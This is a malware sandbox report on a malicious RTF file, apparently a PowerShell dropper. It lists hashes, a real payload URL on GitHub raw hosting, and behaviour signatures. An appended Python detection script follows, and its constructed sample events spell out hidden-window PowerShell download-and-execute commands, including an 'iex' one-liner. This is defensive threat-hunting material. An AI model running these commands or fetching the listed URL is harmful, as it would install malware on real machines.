General

  • Target

    33083e3d8cad434bfff8cdb97032babe.rtf

  • Size

    75KB

  • Sample

    241003-lgghqawdlj

  • MD5

    33083e3d8cad434bfff8cdb97032babe

  • SHA1

    9defb395eda345c770a559ba6c46cba8226c2974

  • SHA256

    85ed27cc2b2264295dfc90a985944887053ffe9a79894914ea7f69e6a7de42e2

  • SHA512

    3750b71501d7412725484c72203a6440647e479fc43991199a2dfb5a4c0c5223ca9858864504d388fec1bbf94c539a1f2bcd56275698803f81bd4301e32ecf6a

  • SSDEEP

    384:+uNWTVICMS5DryYNfvw5vV8Sj7OYqsg4ozn67fT5PfSsMnCbh03MNyC0DAgqh5Ji:XMyGw5vV8fYq3pz6T5SBnC903P0gwtt8

Score
10/10

Malware Config

  • Extracted

    Language      ps1
    Deobfuscated
    URLs
      ps1.dropper   https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
      exe.dropper   https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

Targets

    Score
    10/10
    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell with its display window hidden.

    • Legitimate hosting services abused for malware hosting/C2

    • Drops file in System32 directory
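The signatures above (hidden-window PowerShell, a blocklisted process making a network request, a legitimate hosting service abused for payload delivery, a file written under System32) together with the raw.githubusercontent.com URL extracted in Malware Config describe a pattern that can be hunted in process-creation telemetry. The following is an added example and not part of the sandbox report: it runs a few constructed Sysmon Event ID 1 style (Image, CommandLine) pairs through the check. The only value taken from the report is the extracted dropper URL; the sample events, regexes and the names SAMPLE_EVENTS, parse_raw_github_url, score_event and triage are the example's own.

```python
"""Hunt for hidden-window PowerShell fetching from raw.githubusercontent.com.

Added example, not the sandbox's own detection logic. Sample events below are
constructed; only REPORT_IOC_URL comes from the report.
"""
import re
from urllib.parse import urlparse

# URL taken from the report's Malware Config (ps1.dropper / exe.dropper).
REPORT_IOC_URL = ("https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/"
                  "refs/heads/main/DetahNoth-V.txt")

# Constructed events shaped like Sysmon Event ID 1 (Image, CommandLine).
# Illustrative only; not telemetry from the sandbox run.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     'powershell.exe -w hidden -ep bypass -c "iwr ' + REPORT_IOC_URL
     + r' -OutFile C:\Windows\System32\stage.txt"'),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     'powershell.exe -NoProfile -Command "Get-ChildItem C:\\Temp"'),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     'powershell.exe -WindowStyle Hidden -Command "(New-Object Net.WebClient)'
     ".DownloadString('https://raw.githubusercontent.com/someuser/somerepo/main/run.ps1') | iex\""),
    (r"C:\Program Files\Git\cmd\git.exe",
     "git clone https://github.com/someuser/somerepo"),
]

URL_RE = re.compile(r"https?://[^\s'\"<>)]+")
# powershell.exe accepts parameter-name prefixes, so -w, -win and -WindowStyle
# all mean the same thing; match any of them followed by "hidden".
HIDDEN_RE = re.compile(r"(?i)-w[a-z]*\s+hidden\b")
DOWNLOAD_RE = re.compile(r"(?i)\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|"
                         r"downloadstring|downloadfile|start-bitstransfer|curl|wget)\b")
SYSTEM32_RE = re.compile(r"(?i)\\windows\\system32\\")
POWERSHELL_RE = re.compile(r"(?i)(?:^|\\)(?:powershell(?:_ise)?|pwsh)\.exe$")


def parse_raw_github_url(url):
    """Split a raw.githubusercontent.com URL into owner/repo/ref/path.

    Returns None for any other host. Handles the short form
    .../owner/repo/main/file and the long form .../owner/repo/refs/heads/main/file
    seen in the extracted IOC. The (owner, repo) pair is the durable indicator:
    the file name can be rotated without touching the repository.
    """
    u = urlparse(url)
    if u.hostname != "raw.githubusercontent.com":
        return None
    parts = [p for p in u.path.split("/") if p]
    if len(parts) < 4:
        return None
    owner, repo = parts[0], parts[1]
    if parts[2] == "refs" and len(parts) >= 6 and parts[3] in ("heads", "tags"):
        ref, path = "/".join(parts[2:5]), "/".join(parts[5:])
    else:
        ref, path = parts[2], "/".join(parts[3:])
    return {"owner": owner, "repo": repo, "ref": ref, "path": path}


def score_event(image, cmdline):
    """Evaluate one process-creation event against the report's behaviours."""
    urls = URL_RE.findall(cmdline)
    github_raw = [r for r in (parse_raw_github_url(u) for u in urls) if r]
    flags = {
        "powershell": bool(POWERSHELL_RE.search(image)),
        "hidden_window": bool(HIDDEN_RE.search(cmdline)),
        "download_primitive": bool(DOWNLOAD_RE.search(cmdline)),
        "raw_github_fetch": bool(github_raw),
        "known_ioc": REPORT_IOC_URL in urls,
        # Command-line heuristic only; the report's signature came from
        # file-system events, which this example does not consume.
        "writes_system32": bool(SYSTEM32_RE.search(cmdline)),
    }
    # Alert on the conjunction the report shows: hidden PowerShell that reaches
    # out for a payload (by cmdlet or by a raw GitHub URL).
    alert = flags["powershell"] and flags["hidden_window"] and (
        flags["download_primitive"] or flags["raw_github_fetch"])
    return {"alert": alert, "flags": flags,
            "repos": sorted({f"{g['owner']}/{g['repo']}" for g in github_raw})}


def triage(events):
    """Return the matching events; each alert carries the repo indicator."""
    alerts = []
    for image, cmdline in events:
        result = score_event(image, cmdline)
        if result["alert"]:
            alerts.append({"image": image, "cmdline": cmdline, **result})
    return alerts


if __name__ == "__main__":
    for a in triage(SAMPLE_EVENTS):
        print("ALERT", a["repos"], sorted(k for k, v in a["flags"].items() if v))
```

Two of the four constructed events alert: the one carrying the report's exact URL and a second that pulls a script from a different repository with DownloadString | iex. Blocking the single file path would miss the second and would be trivially bypassed by renaming DetahNoth-V.txt, which is why the example reports the owner/repo pair as the indicator to act on; the plain Get-ChildItem invocation and the git clone stay quiet.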

MITRE ATT&CK Enterprise v15

Tasks